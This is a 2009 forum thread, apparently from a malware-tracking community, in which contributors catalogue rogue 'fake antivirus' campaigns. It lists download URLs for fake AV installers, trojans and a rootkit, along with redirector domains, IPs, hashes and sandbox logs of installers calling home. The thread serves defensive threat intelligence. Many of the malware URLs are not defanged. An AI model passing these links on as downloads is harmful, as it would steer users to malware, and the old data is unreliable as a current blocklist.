hxxp://1-webspyguard.com/download/InternetAntivirusPro.exe
hxxp://1-mas2009.com/download/InternetAntivirusPro.exe
hxxp://1-agentprotect.net/download/InternetAntivirusPro.exe
hxxp://antispystore.com/download/InternetAntivirusPro.exe
hxxp://myantispy.net/download/InternetAntivirusPro.exe

File size: 2029930 bytes
MD5: 52f740f4dd5af2a7bfcfb91cc3e690a1

VirusTotal (http://www.virustotal.com/analisis/875b289a2af80167a2574a49ff09eb60c03d468a1a02901b378037946f52a5ab-1244686741) - 15/39 (38.46%)

Rogue Privacy Center (Privacy Tools Pack):
Code: [Select]
hxxp://spguard2008.com/install.exe

File size: 2203364 bytes
MD5: e08b9468c5985f2c26d81855992e4d4e

VirusTotal (http://www.virustotal.com/analisis/081c945cbe4cdfe501f246d6051a3acb8095d5407b99d6bcb290e3db4e815b61-1243222605) - 24/39 (61.54%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=f84f8de93f7584341c9c736f2f1e94ec&t=1244687085&type=js)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=e08b9468c5985f2c26d81855992e4d4e)

Rogue Antivirus360:
Code: [Select]
hxxp://removevirusonline.com/index.php?g=download
hxxp://removevirusonline.com/av_360.exe

File size: 2093056 bytes
MD5: 3dae34ea276abbc5e3364627458a4111

VirusTotal (http://www.virustotal.com/analisis/8db1593b6dfef9eee31d463f6cbf86806a584e423e690094b3e5131676dcc531-1239612056) - 25/39 (64.10%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=d134f1d5c442b0a726b28e7431a4ff35&t=1244690838&type=js)

Rogue General Antivirus:
Code: [Select]
hxxp://1-myantispy.net
hxxp://1-myspyguard.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 12, 2009, 09:58:42 pm
209.44.126.241 - malware call (redirects)
Code: [Select]
hortshieldpc.com/in.php
intellectsecfind.com/in.php
thefirstupper.com/in.php

209.44.126.102 - Fake AV
Code: [Select]
areascan4.info/download/install.php
finescan4.info/download/install.php
goalscan4.info/download/install.php
hardscan4.info/download/install.php
onescan4.info/download/install.php
page4scan.info/download/install.php
pagescan4.info/download/install.php
portscan4.info/download/install.php
scan4into.info/download/install.php
modescan4.info/download/install.php

64.20.38.171 - Trojan
Code: [Select]
go-exe-go.com/crack.45000.exe
go-exe-go.com/softwarefortubeview.40009.exe
super-exe-home.com/Keygen&Crack.45000.exe
super-exe-home.com/softwarefortubeview.40009.exe
gruzzilla.com/Keygen&Crack.45000.exe
gruzzilla.com/softwarefortubeview.40009.exe
VirusTotal (http://www.virustotal.com/analisis/d8a1d5cc0267485e66b06f2c2837a670dc2ae41c3916c01552e30d1c4509887b-1244828381): 9/39 (23.08%)
VirusTotal (http://www.virustotal.com/analisis/fd44f193dbd554153788a015de16c819a6ca1f91bc8c8ded3c09451f7652fc55-1244828553): 11/39 (28.21%)

213.163.64.81 - Trojan DNSChanger
Code: [Select]
mofmeta.com/download/61676f5647513d3db9a455cb20090602/flash.exe
Wepawet (http://wepawet.iseclab.org/view.php?hash=cbfb26fdf49606d206a0f75f0fe44b61&t=1244828191&type=js)
VirusTotal (http://www.virustotal.com/analisis/7377a605b62abae85f8ca79dd73f50733b152e5ebdf36565b74e37d8a6bf083b-1244828277) - 12/40 (30.00%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1530ab7d5b2bac7b441d69d5471931cf4)
Quote
Connection to 213.163.64.81:80 - [213.163.64.81]
Request: POST /cgi-bin/generator
Response: 200 "OK"

74.52.88.195 - Redirects to rogue:
Code: [Select]
directtechhosting.com/in.cgi?6
directtechweb.com/in.cgi?6
directtechweb.net/in.cgi?6

64.86.17.47 - Redirects to rogue (successor of av-guard.net)
Code: [Select]
av4best.net/?uid=106&pid=3
Wepawet (http://wepawet.iseclab.org/view.php?hash=3c5ac5252cd6d16846411dcf90ef4317&t=1244830477&type=js)

91.212.65.125, 69.4.230.204, 83.133.115.9, 92.62.98.19 - Rogue AV:
Code: [Select]
fastpcscan3.com/1/?id=2022&smersh=973084e1d&back=%3DTQ52DD3NgQOMI%3DN
fastpcscan3.com/download.php?id=2022
fastpcscan3.com/download/Setup-398_02022.exe
Wepawet (http://wepawet.iseclab.org/view.php?hash=3d2c3327b78a9b2cbac79bdb862bcd8c&t=1244789036&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=60f8f56a3a9fb88cb38e391c1d19934a&t=1244789156&type=js)
VirusTotal (http://www.virustotal.com/analisis/66b2e6d246af96022c7e2728cbfa04ff8f5b721ab5ee641848c1d1fdaa20f001-1244789354) - 2/40 (5.00%)

Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 12, 2009, 10:04:51 pm
88.198.41.170 - fake av
Code: [Select]
powerantivirusscannerv2.com/1/?id=2018&smersh=ee0592373&back==TQx2zD4NIQNMI=N
powerantivirusscannerv2.com/download.php?id=2018
powerantivirusscannerv2.com/download/Setup-a5320fa_02018.exe
Wepawet (http://wepawet.iseclab.org/view.php?hash=a70f99ed81b7f7b6931d2e090077f4ac&t=1244828513&type=js)

64.191.102.135 - directs to trojan
Code: [Select]
super-antiviral-scan.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=dcb29c6849abd12215232e04fe98a026&t=1244768624&type=js)

92.62.98.19 - rogue av
Code: [Select]
bestantiviruscheck2.com/1/?id=2013&smersh=bdf6da8d5&back==TQ02DD3NEQMMI=N
bestantiviruscheck2.com/download.php?id=2013
bestantiviruscheck2.com/download/Setup-8d5d21_02013.exe

217.112.94.230 - rogue av
Code: [Select]
downloadsoftwareserver3.com/xpdeluxe.exe
downloadsoftwareserver3.com/iehostcx32.dll

83.133.123.140 - redirects to rogue
Code: [Select]
goldeninternetsites.com/go.php?id=2013&key=a98402e2d&p=1
Wepawet (http://wepawet.iseclab.org/view.php?hash=6054f66bdd60fac6b1b823e449b565fb&t=1244710514&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 16, 2009, 12:53:15 am
209.44.126.22 - Fake AV
Code: [Select]
netsecurityworks.com/download.php

209.44.126.36 - Fake AV
Code: [Select]
stabilitytools.com/download.php

209.44.126.102 - Redirects to Fake AV
Code: [Select]
gorichscan.com
goscanrich.com
goscansoon.com

209.44.126.102 - Fake AV
Code: [Select]
planscan4.info/download/install.php
fullscan4.info/download/install.php
scan4page.info/download/install.php
scanfix4.info/download/install.php

209.44.126.241 - Fave AV
Code: [Select]
scantrustsecurity.com/download.php
gisecurityshield.com/download.php

*****

195.95.151.174 - Fake AV downloader
Code: [Select]
gojaxty.cn/installer_1.exe
fexonhu.cn/installer_1.exe
gihugyx.cn/installer_1.exe
giwgeam.cn/installer_1.exe
VirusTotal (http://www.virustotal.com/analisis/6d59311aaf1ae0ad1462b26ec3c5f5f2027e7ae890aae5a79ca0a1f6fd2a6c0d-1245103256) - 6/23 (26.09%)

then

195.95.151.174 - Fake AV
Code: [Select]
megaantivirusplus.com/redirect.php
megaantivirusplus.com/se.exe
megaantivirusplus.com/setup.exe
megaantivirusplus.com/cb/real.php?id=1
megaantivirusplus.com/cb/installs.php?id=1
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=895c832c623d20063a782ea6180356ef)

******

84.16.235.187 - Fake AV
Code: [Select]
gen6scan.info/download/install.php
scannote6.info/download/install.php

204.27.57.227 - Fake AV
Code: [Select]
scan4note.info/download/install.php
top4scan.info/download/install.php

*******

Fake codec
Code: [Select]
my-xxl-tube.com/xplay.php
tube-collection.com/xplay.php
tube-storages.com/xplay.php
tubes-portal.com/xplay.ph

then trojan

Code: [Select]
hot-exe-area.com/streamviewer.40000.exe
hot-exe-area.com/softwarefortubeview.40009.exe
exe-2009-ok.com/TubeViewer.ver.6.40000.exe
exe-2009-ok.com/softwarefortubeview.40009.exe
main-exe-home.com/TubeViewer.ver.6.40000.exe
main-exe-home.com/softwarefortubeview.40009.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 28, 2009, 05:57:46 pm
Rogue AV

38.105.19.27
Code: [Select]
scan6user.info/download/install.php
scanuser6.info/download/install.php
scan6way.info/download/install.php
scanway6.info/download/install.php
way6scan.info/download/install.php
wayscan6.info/download/install.php
luxscan6.info/download/install.php
scan6fix.info/download/install.php
scan6note.info/download/install.php
genscan6.info/download/install.php
atomscan6.info/download/install.php
user6scan.info/download/install.php
ina6co.com/cki.php?uid=keyin
ina6sk.com/reports/download-report.php?prod_id=9
ina6sk.com/download/file.exe
ina6sk.com/download/InternetAntivirusPro.exe
goscaniron.com
goscanslim.com
goslimscan.com

209.44.126.x
Code: [Select]
securitywidgets.com
thesecuritytools.com

***

redirects to rogue

Code: [Select]
bestinternetoverview.com/go.php?id=2022&key=4c69e59ac&p=1
birthdaypostcard.cn/go.php?id=2022&key=4c69e59ac&p=1
lastfmmusic.cn/go.php?id=2004&key=ff0057594&p=1
quakeworldlive.cn/go.php?id=2022&key=4c69e59ac&p=1
apoiweh.cn/x_private_backtraffnail.php/?uid=102
22may2009.com/xr/in.php?r=default&s=morning&ss=c55aab543facee40ba25&seref=&ref=http://michael-jackson-s-son-
goto-my.com/t.php?s=morning&ss=c55aab543facee40ba25
blanket.bitelere.us

redirects using d87*eu/2.js

Code: [Select]
a2porn.us
a3porn.us
a4porn.us
a5porn.us
a6porn.us
a7porn.us
celebyama.com
moocelebs.com
ralfscelebs.com
yoocelebs.com
daniel-ratcliffe-nude.a2r.us
naked-girl-pool.a2g.us
i-wuhrer-sex-scene.a2h.us
vintage-porn-movies.a2v.us
teen-swimsuit-lingerie-models.a2x.us
nude-amateur-clips.a2y.us
sex-free-gallery.a2r.us
lf-hunter-videos.a5b.us
milf-hunter-videos.a5b.us
no-creditcard-porn.a2r.us
michael-jackson-and-brooke-shields.a2h.us
janet-jackson-all-for-you.a2g.us
andrea-jackson-nude.a2p.us
janet-jackson-tonights-the-night.a2h.us
fkk-mature-foto.a2v.us
janet-jackson-discipline.a2c.us
www-nude-young.a2q.us
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 28, 2009, 08:07:56 pm
Rogue AV:

Code: [Select]
hxxp://best-protect.info/install.php
hxxp://download.best-protect.info/dl/PreInstaller.exe

VirusTotal (http://www.virustotal.com/analisis/fa77ed85c5f3c14c8ca805b376eac93e2ce9f9b7201bc3de273929a5d0d3dbc3-1246204835) - 6/41 (14.63%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=8f72c900744c9b454ef7030408e23c86&t=1246217307&type=js)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1e85f0d74aeb04b9411414517a637623f)

Quote
From ANUBIS:1032 to 70.38.11.165:80 - [70.38.11.165] 
Request: GET /admin/cgi-bin/get_domain.php?type=download 
Response: 200 "OK" 
Request: GET /admin/cgi-bin/get_domain.php?type=download 
Response: 200 "OK" 
Request: GET /admin/cgi-bin/get_domain.php?type=download 
Response: 200 "OK" 
Quote
From ANUBIS:1033 to 174.142.113.205:80 - [download.best-protect.info] 
Request: GET /collection.php?step=InstallBegin&id=none 
Response: 404 "<empty>" 
Request: GET /dl/Installer.exe 
Response: 200 "OK" 
Request: GET /dl/ABEST.CAB 
Response: 200 "OK" 
Request: GET /dl/QWProtect.dll 
Response: 200 "OK" 
Request: GET /dl/BS.exe 
Response: 200 "OK"

Code: [Select]
hxxp://7security.info/?uid=102&pid=3
hxxp://7security.info/?cmd=executeRedirect&p=rVaunZxWcmqRX5CIoZmRVmxrkE%2FDkpLYT52GqXKKhne7g49bm6RbblpsaWeTYZWUZmBbZWRxhlmEnKOIZ5mQhaCqVHCH2NmOoH%2Bno6%2BiWmWDj83KU2pPlpGN0pjQn6fUT4%2BG1qWYpqvYg52tpKmeYFqpqqWDZ4bOpaSdbo5nwFzDoJ%2FPpMjMkZSljmXdwNOrm6qaqJ2TmprEmNjYkpaTopOh0FvSmKCIqg%3D%3D
hxxp://7security.info/?p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjY4nT1m6uqIvTrNGoqaJflqGYdZvAgtLRn5%2Bkog%3D%3D

hxxp://protectionurl.info/?uid=102&pid=3
hxxp://protectionurl.info/?cmd=executeRedirect&p=rVaunZxWcmqRX5CIoZmRVmxrkE%2FDkpLYT52GqXKKhne7g49bm6RbblpsaWeTYZWUZmBbZWRxhlmEnKOIZ5mQhaCqVHCH2NmOoH%2Bno6%2BiWmWDj83KU2pPlpGN0pjQn6fUT4%2BG1qWYpqvYg52tpKmeYFqpqqWDZ4bOpaSdbo5nwFzDoJ%2FPpMjMkZSljmXdwNOrm6qaqJ2TmprEmNjYkpaTopOh0FvSmKCIqg%3D%3D
hxxp://protectionurl.info/?p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjY4nT1m6uqIvTrNGoqaJflqGYdZvAgtLRn5%2Bkog%3D%3D
hxxp://protectionurl.info/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjZYnT1m6uqIzO1NeaWJaimHWWl4KmZQ==

hxxp://myofficeguard.info/?p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjZInT1m6uqI61h8WilnGbk4F5bw==

Anubis (http://anubis.iseclab.org/?action=result&task_id=1596a8b734a38faa4197bd74022b7a3ac)

Quote
From ANUBIS:1033 to 64.86.17.9:80 - [updvmfnow.cn] 
Request: POST /reports/minstalls.php 
Response: 200 "OK" 
Request: POST /reports/minstalls.php 
Response: 200 "OK" 
Quote
From ANUBIS:1035 to 206.53.61.73:80 - [update1.fastantivirus09.com] 
Request: HEAD /ReleaseXP.exe 
Response: 200 "OK" 
Request: GET /ReleaseXP.exe 
Response: 200 "OK" 

Payment page for rogue av:
Code: [Select]
hxxp://restricteddomainhelp.com/1/
==>
hxxp://msncoreupdate.com/buy.php?
==>
hxxp://secure.onlineantivirusmarket.com/buy.php?

Wepawet (http://wepawet.iseclab.org/view.php?hash=c5e108624d44e8c30a9ca4e88c80036e&t=1246076039&type=js)

Code: [Select]
hxxp://restricteddomainhelp.com/1/
==>
hxxp://msncoreupdate.com/buy.php
==>
hxxps://secure.privatesecuredpayments.com/billpav/?
Title: Re: Rogue - Fake AV -
Post by: Netelligent1 on July 23, 2009, 10:38:16 pm
I think this following youtube is proof how unprofessional these folks are at Netelligent Hosting Services Inc .  If i was hosting a bunch of virii, I would want it stopped.

See a phone call about this to them and how they don't give a crap.

Check out the googgle map, they run the datacenter out of a home?!?! or is it a fake address?

http://www.youtube.com/watch?v=TuXxDYNrOe0

Title: Re: Rogue - Fake AV
Post by: MysteryFCM on July 24, 2009, 12:41:12 am
The download for the site referenced on the YouTube page is;

namearra.info/download/install.php

Which downloads a file called install.exe, which is a fake AV and apparently, as a bonus, also gives you the TDSS rootkit:

http://www.virustotal.com/analisis/7a924c9b8ee6d669dcb319ea5b91b15b926ad0f7ac03e3099c15f5dbae765e2e-1248394178
Title: Re: Rogue - Fake AV
Post by: ocean on July 29, 2009, 09:40:18 am
Code: [Select]
http://nomalwares.com/wich redirects to setup of know
Code: [Select]
http://www.malwarebot.com/ through clickbank.net

http://www.virustotal.com/analisis/b7fb223df6da629ba93fd95897a496794be63216ce9f53107e1714d9c980bbc9-1248860632
Title: Re: Rogue - Fake AV
Post by: CkreM on July 30, 2009, 07:10:33 am
Fake AV:
Code: [Select]
wertabulionsedaf.com/2/installer/Installer.exe?u=1025&s=e8f4f9a25ccda16144f11cd34e2528ff&t=2
retulahertomanof.com/2/installer/Installer.exe?u=1025&s=e8f4f9a25ccda16144f11cd34e2528ff&t=2
http://www.virustotal.com/analisis/93118ae2bb741aac13c9f4e74452ad33811a05c4b3adfaebf17bacc3f3bd0a92-1248937352
Code: [Select]
home-anti-virus2010.com
Homeantivirus2010.com
Homeav2010.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on August 17, 2009, 12:43:55 am
78.46.201.89 (redirectors to fake av aka personal antivirus)

Code: [Select]
b2b-forums.cn
bestvanillaresorts.cn
consensualart.cn
goldensunshine.cn
guidetogalaxy.cn
mywatermakrs.cn
personalrespect.cn
snowboard2009.cn
vipsoccermanager.cn

payload: /go.php?id=2013-01&key=a98402e2d&p=1

195.95.151.174 and 91.213.29.250

payload :

/installer_1.exe
/install.exe
/test.exe

or whatever you want with .exe

Code: [Select]
aguraot.cn
ajokauz.cn
ajuadeb.cn
ajufeiv.cn
ajyawif.cn
akeraoq.cn
akipahu.cn
akoede.cn
akoetly.cn
ameapi.cn
ameojyl.cn
amoujag.cn
anamuco.cn
aniuha.cn
aniulu.cn
anoemyx.cn
apefovy.cn
ateudny.cn
ateugic.cn
ateygi.cn
ateylqo.cn
atiawy.cn
atiguko.cn
ativoma.cn
atoacu.cn
atoceuk.cn
atofaf.cn
atuican.cn
atuyfe.cn
atuypha.cn
atyorzi.cn
atyrefi.cn
avayhik.cn
avemyk.cn
aveyco.cn
aveylpa.cn
avinyk.cn
aviopuh.cn
avoapyt.cn
avoeksi.cn
avoilem.cn
avomec.cn
avotyab.cn
avyatoh.cn
avyciso.cn
avyewi.cn
avygip.cn
avyodu.cn
avyofzu.cn
avyxaze.cn
awakuvi.cn
awaokfy.cn
awapero.cn
awaviyh.cn
awetudo.cn
awixys.cn
awoenpa.cn
awohebu.cn
awointa.cn
awozyt.cn
awukoga.cn
awumeha.cn
awuofo.cn
awupayk.cn
awyiqy.cn
awykep.cn
axaloeq.cn
axaobe.cn
axaonyc.cn
axecaif.cn
axeonar.cn
axeubi.cn
axeziry.cn
axezuko.cn
axiufow.cn
axiyqje.cn
axobaeg.cn
axoejaw.cn
axominy.cn
axucame.cn
axuewpo.cn
axuiwi.cn
axuovaf.cn
axygaek.cn
axykoqi.cn
axyqoz.cn
azacior.cn
azaedo.cn
azaujyr.cn
azeifko.cn
azejyri.cn
aziduon.cn
aziwote.cn
aziybga.cn
azoeldy.cn
azoexyh.cn
azokicu.cn
azovuqe.cn
azulydo.cn
azuones.cn
azuwem.cn
azysof.cn
babomvy.cn
bagsuni.cn
bagucqy.cn
bajnouq.cn
bajtoun.cn
bakyfxi.cn
banpyz.cn
bansexy.cn
bapebtu.cn
baqcemy.cn
baswoju.cn
bavwyto.cn
bazyrpe.cn
bebqac.cn
bedacqo.cn
bedgyg.cn
bedkosi.cn
bedtuif.cn
befpygi.cn
beguqiw.cn
behiswa.cn
beqgivo.cn
bestyru.cn
betimi.cn
betsuq.cn
bevafzi.cn
bewugox.cn
bexazyj.cn
bicqoej.cn
bikodny.cn
biqusu.cn
birzuof.cn
bisqop.cn
bisquva.cn
bizagy.cn
bizeda.cn
bobqaul.cn
bobujgi.cn
bocisak.cn
bocvur.cn
boknegi.cn
bokpaej.cn
bomkyvi.cn
borive.cn
boszacy.cn
boxmic.cn
bozipe.cn
boziqdu.cn
bozkus.cn
bozradi.cn
bubita.cn
dadquox.cn
dahure.cn
dajugif.cn
dakyqop.cn
ezeunac.cn
ezoagu.cn
ezuxevo.cn
fidteur.cn
fifteko.cn
fifxuer.cn
fimcuoj.cn
finwuyc.cn
fisruba.cn
fixguat.cn
fobrim.cn
focunqa.cn
fogpak.cn
fomazej.cn
fombual.cn
foszecy.cn
fotkum.cn
gopawu.cn
gopiby.cn
goqfap.cn
gortuwe.cn
gotceyr.cn
gotuqjy.cn
govaqip.cn
gowyti.cn
goxweyc.cn
gubcyil.cn
gubywef.cn
gugema.cn
gugkyaf.cn
gujdywa.cn
gurqyak.cn
gutciko.cn
guxryac.cn
gybukop.cn
gybwuv.cn
hagnuor.cn
haronpi.cn
idyise.cn
idyzok.cn
zypudo.cn
zyrnuhe.cn
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on August 17, 2009, 01:16:32 am
rogue fraudtool:
Code: [Select]
unvirex.com/UnVirexInstall.exe
199.238.181.158/setup.exe
199.238.181.161/setup.exe
intelinet-global.com/setup.exe
intelinet-global.net/setup.exe
intelinet-secure1.com/setup.exe
intelinet-secured.com/setup.exe
intelinet-dll-repair.com/setup.exe

systemsecurity:
Code: [Select]
serversafety.com/download.php
cybernetsafety.com/download.php
cheapsecurityscan.com/download.php
cheapsecurityscan.com/install/ws.exe
bestscannerever.com/download.php
bestscannerever.com/install/ws.exe
gersoft.info/download.php
gersoft.info/install/ws.exe

other rogue:
Code: [Select]
antiviruspro-live.com/Setup.exe

AdvancedVirusRemover:
Code: [Select]
bestscanpc.org/cgi-bin/load.pl

internetantiviruspro:
Code: [Select]
inb4it.com/download/file.exe
inb4it.com/download/InternetAntivirusPro.exe

smartprotectorpro:
Code: [Select]
195.95.151.184/smrtprt/setup.php?track_id=10001

fakespypro:
Code: [Select]
210.51.187.45/lib/update.exe

trojan fakerean:

payload:

/1/installer/Installer.exe
/2/installer/Installer.exe
/3/installer/Installer.exe
Code: [Select]
1024service.com
absolute-sports.com
amerikosamoder.com
berdanovskalonas.com
berhutervalonio.com
bugermanosatora.com
buteratorader.com
byhelp.com
car-motor.net
dealivery.com
educationdegreeonline.net
ertonagionalos.com
filewongatorda.com
golinovatorew.com
guletrmonahertuli.com
guletrubanionader.com
kiluretynefads.com
lilusanotraserta.com
millenyi.com
molinasdeals.com
mulikostarokaser.com
numbergatoriosso.com
odogdisconts.com
pcprogredukt.com
pcredirbugelda.com
pcredirlimasolat.com
pcredirokat.com
pcredirtumbasot.com
pcsecnitrosat.com
polakestrovanios.com
polserdagoniosa.com
queerdiscdeals.com
qwedasertafoas.com
reddogdiscounts.com
redipolkanosata.com
redirosanokas.com
redopalikosafer.com
redugaferdatona.com
redusecovulia.com
reeni.net
refadertogamo.com
sammyboydeals.com
sloon.net
starmak.net
uilerdobavonader.com
uiterbunagoretas.com
urgettindeals.com
vulertunerilos.com
vulesdaboknoerba.com
vuleskanorionas.com
wertubertagosad.com
wertugalionasewa.com
wertugalionetsa.com
wervaferganiota.com

fake windows security suite:
Code: [Select]
vmeltonline.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
webssearch.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
search-out.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
mykeepplace.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
linewebsearch.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
go-in-search.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
searchurlguide.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
secure-pro.cn/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
softsales-discount.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
safemanagment.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
searchinfoonline.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
safe-pay-vault.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
Title: Re: Rogue - Fake AV
Post by: sriramp on August 20, 2009, 12:09:12 pm
http://addedantiviruspro.com/
http://addedantiviruslive.com/
http://yourcountedantivirus.com/
http://easyaddedantivirus.com/
http://myplusantiviruspro.com/
http://addedantivirusonline.com/
http://addedantivirusstore.com/
http://realantivirusplus09.com/
http://freeantivirusplus09.com/
http://getantivirusplusnow.com/
http://getantivirusplusnow.com/
http://antivirusplusnow.com/
http://megaantivirusplus.com/
http://getavplusnow.com/
http://antivirusplus-ok.com/
http://nextantivirusplus.com/
http://i-antivirusplus.com/
http://goodantivirusplus.com/
http://yesantivirusplus.com/
http://antivirus-plus-now.com/
http://antivirusplus09.com/
http://internetantivirusplus.com/
http://mybestantivirusplus.com/
http://antivirusplus2010.com/
Title: Re: Rogue - Fake AV
Post by: SpiderLover on August 21, 2009, 11:50:14 pm
Fake AV Scan Page.

Code: [Select]
hqpcscanner.com/online/9a8e5e72bfe78caae6a2b07ff47b6602/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2
Payload.

Code: [Select]
veikalerd.com/download/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2/14
Title: Re: Rogue - Fake AV
Post by: SysAdMini on August 22, 2009, 06:21:14 am
Fake AV Scan Page.

Code: [Select]
hqpcscanner.com/online/9a8e5e72bfe78caae6a2b07ff47b6602/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2
Payload.

Code: [Select]
veikalerd.com/download/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2/14

downloads Rogue Savesoldier
http://www.threatexpert.com/report.aspx?md5=455c8798ec8441ed406d57c79b16f9f7

Code: [Select]
www.savesoldier.com/downloader.php?p=NvquysXZPvzWwOJYEkMBu7bYMTU%2F5q6WKFFJRk0LPDM%3Dhttp://www.virustotal.com/analisis/76f8e18f0e8df2c8e91bc2f8595dc1ac06f4221a2912443bd68222d05f7929bb-1250922382 3/41
Title: Re: Rogue - Fake AV
Post by: SpiderLover on August 30, 2009, 04:49:45 pm
Code: [Select]
http://newwayscanner.info/24/24-021wL1AzLwEzL==
Fake AV Scan Page.

Code: [Select]
ntrytodownload.info/install.exeDownloads Rogue.

Title: Re: Rogue - Fake AV
Post by: XiTri on September 02, 2009, 09:06:47 am
Code: [Select]
hxxp://av-scan-64.com/
hxxp://boomexe.com/av-scanner.0.exe
Title: Re: Rogue - Fake AV
Post by: SysAdMini on September 03, 2009, 04:53:09 pm
Code: [Select]
angelinajmovies.cnredirects to
Code: [Select]
sexy-pornoz.ru/free-porn.phpredirects to fake antivirus
Code: [Select]
vrenutredo.com/download/a37bddc7e715b39b2dd0578c63441da5/3656b9eddb95cfb9d7f013ed46b015a2 http://www.virustotal.com/analisis/2aa00fc173d127686d152f8bd081d9f82015f245a687a23a17ac77661cbf57a3-1251996391 6/41
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 05, 2009, 02:15:11 pm
They're a lot of fake av today. Especially in the VELCOM's network.

WindowsSystemSuite Family

work with:

/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%3D%3D

Code: [Select]
searchsafetyprotection.net
search-systemshield.com
system-guard.net
virusfilter-zone.net
winprotection-suite.net
go-scansystem.net
scanvirus-online.net
scansystem-online.com
scansystemonline.com
go-searchprotection.com
gotomyprotectedzone.com
myprotected-zone.com
mysecurityshield.net
scanonline-protect.com
newpcguard.net
safetysystem-shield.net
searchpcguard.com
mysystemsecurity.com
secure-systemshield.com
searchsecureguard.com
pconlinescan.net
scanandsecure.net
gosearchinweb.com
safetysystem-shield.com
mysecurity-zone.net
securesystemguard.net
gotomyprotectedzone.net
secure-systemshield.net
secure-systemguard.net
secure-systemguard.com
scan-secure.net
checkvirus-zone.net
scanonline-protect.net
myvirusscanner.net

associated:

Code: [Select]
windowssecuritysuite-pro.com
windowsguardsuite.com
windowsadditionalguard.com
update1.windowsadditionalguard.com
update2.windowsadditionalguard.com
pay1.windowsadditionalguard.com
pay2.windowsadditionalguard.com
windowsguardpro.com
update1.windowsguardpro.com
update2.windowsguardpro.com

other fake av:
Code: [Select]
homepersonalantivirus.com
extra-antivir.com

Code: [Select]
